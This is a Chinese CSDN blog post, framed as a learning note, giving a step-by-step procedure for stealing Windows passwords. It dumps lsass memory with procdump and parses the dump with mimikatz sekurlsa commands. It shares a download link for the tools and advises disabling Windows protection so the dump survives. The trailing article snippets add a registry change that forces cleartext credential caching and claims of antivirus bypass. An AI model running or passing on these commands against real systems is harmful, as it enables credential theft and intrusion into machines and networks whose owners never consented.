mimikatz获取密码_利用procdump+mimikatz读取密码

最新推荐文章于 2024-07-21 21:28:13 发布
最新推荐文章于 2024-07-21 21:28:13 发布
阅读量1.8k 收藏
点赞数
文章标签: mimikatz获取密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39551103/article/details/111709471
版权
本文介绍了如何通过procdump导出lsass进程内存,然后使用mimikatz分析以获取Windows系统密码的过程。详细步骤包括以管理员权限运行cmd,使用procdump生成lsass.dump文件,接着用mimikatz读取密码。注意操作时需关闭系统防护,以防文件被自动删除。
摘要由CSDN通过智能技术生成

今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。

工具我也都整理好了,

链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg

提取码:b1q6

procdump,可以将lsass进程的内存文件导出来;

mimikatz,可以对导出的内存文件进行分析,从而获取密码。

1,管理员权限打开cmd

procdump64.exe-accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件

ae2ee7796724260dd6bbfefb5c6b6729.png

1ca1a9621999b77891baeb5ee7c1782a.png

2,管理员权限打开mimikatz.exe

执行privilege::debug;

a20a77bce3d1e3246ec44dd73905b83b.png

3,管理员权限打开cmd

把lsass.dmp放在mimikatz目录利用

mimikatz.exe"sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswordsfull" exit

最后成功读取了密码:

e2b11a0ac78ae13d19bf81ebd35386f9.png

需要注意的是,把windows系统的自动防护关了,不然电脑会把生成的内存文件自动删掉...

weixin_39551103
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-14 804
ProcDump 还包括使用窗口挂起 (使用相同的窗口挂起定义,Windows任务管理器使用) 、未经处理的异常监视,并且可以根据系统性能计数器的值生成转储。3、使用PowerSploit 的Out-MiniDump模块,PowerSploit是一个基于 Powershell 的渗透工具包,可以选择创建进程的完整内存转储。从lsass进程中提取passwords、keys、pin、tickets等信息。2、使用procdump 导出lsass.dmp文件。5、读取lsass.dmp文件
procdump+mimikatz.zip
11-14
procdump+mimikatz
利用procdump+mimikatz读取windows系统中的密码
LUOBIKUN的博客
09-07 3425
利用procdump+mimikatz读取windows系统中的密码 今天在学习的过程中,认识了一个工具,可以很简单的就读取windows系统的密码,觉得特别有趣,就自己亲自上手尝试了一下,果然很简单,就是因为比较笨,过程有点曲折,特此记录。 工具我也都整理好了, 链接:https://pan.baidu.com/s/1005cCJe-gJq_Q2vZ7M9lwg 提取码:b1q6 procdump,可以将lsass进程的内存文件导出来; mimikatz,可以对导出的内存文件进行分析,从而获取密码。 1,
内网安全:各类密码的抓取
最新发布
8888的博客
07-21 1988
sam文件和lsass进程就是Windows存储本地密码文件和进程,我们可以通过读取sam文件和lsass进程,可以获得本地的用户密码,从而进行内网横向。
利用procdump+Mimikatz 绕过杀软获取Windows明文密码
热门推荐
冷风
09-30 2万+
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6
利用Procdump+Mimikatz获取Windows帐户密码
cj_Hydra's Blog
01-29 1032
复现过程 导出lsass.exe 首先要获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到,这里用到微软官方发布的工具Procdump导出lsass.exe,所以不存在被杀软拦截的情况: 上传文件procdump64.exe到可执行目录中,执行下面语句: procdump64.exe -accepteula -ma lsass.exe lsass.dmp ...
procdumpmimikatz联动
weixin_45715461的博客
06-30 712
procdumpmimikatz联动
Procdump+Mimikatz获取Windows明文密码
SheXinK’s Blog
11-10 2481
Procdump+Mimikatz获取Windows明文密码1 测试环境2 抓取密码 2.1 Server 2008 R2抓取  2.1.1 生成存储文件  2.1.2 mimiakatz密码获取 2.2 Server 2012 R2抓取  2.1.1 修改注册表  2.1.2 mimiakatz密码获取 1 测试环境  系统:   Server 2008 R2   Server 2012 R2 ...
mimikatz配合procdump抓取密码
qq_44881113的博客
09-16 3945
0x01 获取本地帐户密码 1.1 本地执行 下载mimikatz程序,找到自己系统对应的位数,右键以管理员身份运行: (不是管理员会报错) #提升权限 privilege::debug #抓取密码 sekurlsa::logonpasswords 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 cmd修改注册表命令: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider
Procdump+mimikatz绕过安全防护读取密码
课嗨教育的专栏
04-02 370
0x01 介绍 在我们提权过程中经常会遇到杀毒软件,在我们将提权exp或者密码读取工具一上传至目标服务器立马被删的尴尬,本文完美解决此问题。 0x02 procdump介绍 Procdump是微软自家的外部工具,其主要目的是监视应用程序中的CPU尖峰并在尖峰期间生成崩溃转储。 具体可以查看:https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 0x03操作 使用procdump转储lsass进程 procdump64.ex
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap)
qq_45290991的博客
09-16 1143
内网渗透作业2(mimikatz、pwdump/procdump/LaZagne/nmap) 很紧张很“充实”的培训,今天主要是教了怎么抓取PC的密码…… 密码抓取5法 1.1mimikatz抓取明文密码 mimikatz是一个法国人写的轻量级调试器。出众之处在于其可以直接从 lsass.exe 里猎取windows处于active状态账号明文密码,非常强大。 在网上找了一些相关的文章自己的一点总结吧 下载地址:https://github.com/gentilkiwi/mimikatz/rele
mimikatz获取系统密码
03-28
获取系统级别密码
procdump32_64+mimikatz.rar
06-15
procdump32_64 mimikatz,测试可以用,获取系统的密码信息。
mimikatz获取系统管理员账号明文密码工具
02-15
mimikatz 是一个来自法国的神器,能直接读取系统管理员密码明文,通杀xp win2003 win7 win2008,这个工具功能很强大,如果您能熟练运用它,就能体会到。
mimikatz获取密码_Mimikatz使用大全
weixin_39642761的博客
12-05 535
0x00 简介Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码, lsass是微软Windows系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统时输入密码之后,密码便会储存在 lsass内存中,经过其 wdigest 和 tspkg 两个模...
mimikatz抓取密码
G208_522的博客
10-26 4758
mimikatz抓取密码
密码抓取--Prodump+Mimikatz抓取windows系统密码
网络安全。
02-13 1387
1、查看目标系统管理员登录情况,管理员在线,抓到明文密码的可能性更大。 query user 2、查看目标系统版本。 wmic OS get Caption,OSArchitecture 3、通过Procdump dump lsass.exe 进程数据并将其保存到 lsass.dmp 文件中。 procdump64.exe -accepteula -ma lsass.exe lsass.dmp...
mimikatz获取密码_mimikatz实战域渗透抓取域控管理员密码
weixin_39562327的博客
12-24 912
实验环境:攻击机:Kali ;靶 机:Windows server 2012 ;工具:mimikatz2.1;条件:靶机获取到shell之后必须是管理员的权限;步骤:**我这里攻击利用的msf里面的regsvr32_applocker_bypass_server模块 利用的是注册表漏洞** ps:其实这个也不远是漏洞,是微软自己不承认它是漏洞,但是黑客可以利用这个BUG下面我们就要利用msf生成攻...
mimikatz 读取 win10密码
03-16
Mimikatz是一款用于读取Windows...它可以通过抓取系统内存中的密码信息,或者直接读取系统中的密码哈希值,来获取用户的登录密码。但是需要注意的是,使用Mimikatz读取他人密码是非法的行为,应该遵守相关法律法规。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值